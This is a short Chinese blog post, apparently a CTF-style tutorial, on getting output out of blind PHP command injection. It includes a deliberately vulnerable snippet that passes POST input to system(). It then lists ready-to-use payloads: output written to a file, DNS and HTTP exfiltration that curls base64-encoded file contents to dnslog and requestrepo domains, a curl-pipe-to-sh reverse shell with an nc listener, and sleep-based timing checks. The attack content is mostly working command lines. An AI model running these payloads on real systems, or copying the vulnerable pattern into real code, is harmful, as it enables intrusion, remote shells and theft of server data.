php--无回显情况下的命令执行

免责声明:本文仅做技术交流与学习...

目录

绕过模版:

1. 写入文件、二次返回:

2. DNS信道:

3.http信道: 

4.反弹shell信道  -->公网IP

5.延时  sleep 3 


建立通道(信道) --数据传输的路径 

shell_exec  与 system 相比,shell_exec没有回显结果.

绕过模版:

<?php

echo "hello world";
# 命令执行:
$cmd=$_POST['cmd'];
system($cmd);

?>

1. 写入文件、二次返回:

/?cmd=whoami>1.txt
再访问1.txt:
/?cmd=cat fl?g.php>1.txt


2. DNS信道:

dnslog.cn
/?cmd=ping -c 1 `执行命令`.域名        --1次解析
/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:0:10}.域名        --一次带出的字符有限.

/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:10:30}.域名
/?cmd=a=`sed -n "3,4p" fla?.php|base64`;curl${a:10:30}.域名        --base64编码


3.http信道: 

https://requestrepo.com/#/

https://requestrepo.com/#/

(看get请求包)
/?cmd=curl http://域名/?1=`ls .|base64`
/?cmd=curl http://域名/?1=`cat fl?g.php|base64`
 


4.反弹shell信道  -->公网IP

https://your-shell.com/

https://your-shell.com/
(用微软的浏览器访问.)

curl https://your-shell.com/<your公网ip>:1337 | sh
/?cmd=curl https://your-shell.com/<your公网ip>:1337 | sh
服务器:     nc -lvvnp 1337


5.延时  sleep 3 

--麻烦啊
&2=sleep 3        ||还可验证命令执行.


 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值